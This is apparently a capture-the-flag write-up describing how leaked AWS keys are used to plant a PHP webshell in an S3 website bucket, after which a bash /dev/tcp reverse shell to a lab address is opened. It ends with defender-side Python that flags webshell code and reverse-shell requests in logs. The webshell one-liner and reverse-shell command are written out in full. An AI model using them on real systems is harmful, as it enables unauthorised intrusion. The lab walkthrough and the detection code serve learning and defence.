Using Burp Suite and creating a reverse shell

I've got the keys and I can either take them back to my own machine and try to enumerate that way, or I can see what else I can find from the AWS CLI.

help screen, slight error

Correct result. Looks like HTML entity encoding. I can decode this and see what I get.

send to decoder

do a smart decode

Results

Can see the bucket's name is website. Now if I want to interact with that I can do so through the webshell s3api.

Listing all the directories in s3 and then all the information in s3 website. Back to what we initially saw when exploring the site without the shell, which means I might need to write a PHP script for the server.

echo "<?php system(\$_REQUEST['ippsec']); ?>" | base64

The script above is what I used; the output below is what was returned. Base64 encoding is utilized to avoid bad characters, in this case the double quote.

Creating a file to save it to

Now that it was saved as a file with no errors, I want to copy it into the S3 website but under a different name. The matching bytes show it was all copied with no problem.

Now with "?ippsec=ls" added to the end we can see the code execution was successful.

Now to get a reverse shell

nc -lvnp 9001

Now I put the reverse shell code into Burp Suite and URL encoded it.

bash -c 'bash -i >& /dev/tcp/10.10.14.181/9001 0>&1'

This confirms the shell is up and running.
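As an added defender-side example (my own code, not part of the original writeup), the checker below looks for the two artifacts this chain leaves behind: a PHP file whose exec sink is fed straight from request input (also when it is hidden in a base64 blob, as the one-liner above is), and access-log requests to a static bucket site that hit a .php object or carry the bash /dev/tcp reverse-shell form in a query value. The PHP content and log lines are constructed samples.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# PHP command-execution sinks fed directly from request input, as in the one-liner above.
WEBSHELL_RE = re.compile(r"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(REQUEST|GET|POST)\b")
# Reverse-shell markers in decoded query values (the bash /dev/tcp form used above).
REVSHELL_RES = [re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"), re.compile(r"\bbash\s+-i\b")]
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")      # base64 runs worth decoding
REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')  # request target in a combined-format log line

def scan_php_source(source: str) -> list[str]:
    """Return webshell indicators found in raw PHP source or inside base64 blobs it carries."""
    hits = []
    if WEBSHELL_RE.search(source):
        hits.append("request-to-exec sink")
    for blob in B64_RE.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if WEBSHELL_RE.search(decoded):
            hits.append("base64-wrapped request-to-exec sink")
    return hits

def flag_requests(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (path, reason) pairs for requests that should not occur on a static S3 website:
    execution of a .php object, or a reverse-shell command in a query-string value."""
    flagged = []
    for line in log_lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if parts.path.endswith(".php"):
            flagged.append((parts.path, "php executed on static site"))
        # parse_qsl percent-decodes values, so the URL-encoded payload is matched in clear text
        for _, value in parse_qsl(parts.query, keep_blank_values=True):
            if any(r.search(value) for r in REVSHELL_RES):
                flagged.append((parts.path, "reverse shell in query value"))
                break
    return flagged

# Constructed samples: the one-liner from the writeup, its base64 form, and fake access-log lines.
SAMPLE_PHP = "<?php system($_REQUEST['ippsec']); ?>"
SAMPLE_B64 = base64.b64encode(SAMPLE_PHP.encode()).decode()
SAMPLE_LOG = [
    '10.10.14.181 - - [01/Jan/2021:10:00:00 +0000] "GET /shell.php?ippsec=ls HTTP/1.1" 200 512',
    '10.10.14.181 - - [01/Jan/2021:10:00:05 +0000] "GET /shell.php?ippsec=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.14.181/9001%200%3E%261%27 HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2021:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024',
]
```

Run over a bucket listing, scan_php_source catches the uploaded file whether or not it was base64-wrapped, and flag_requests separates the benign ?ippsec=ls probe from the reverse-shell request only by the second reason.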

I can see all the ports currently listening. 127.0.0.1:8000 stands out because it is the only port listening on localhost.

root flag found

Took me a few tries to get the syntax right because I did not add terms or PuTTY, so the tab and arrow keys for editing did not work.
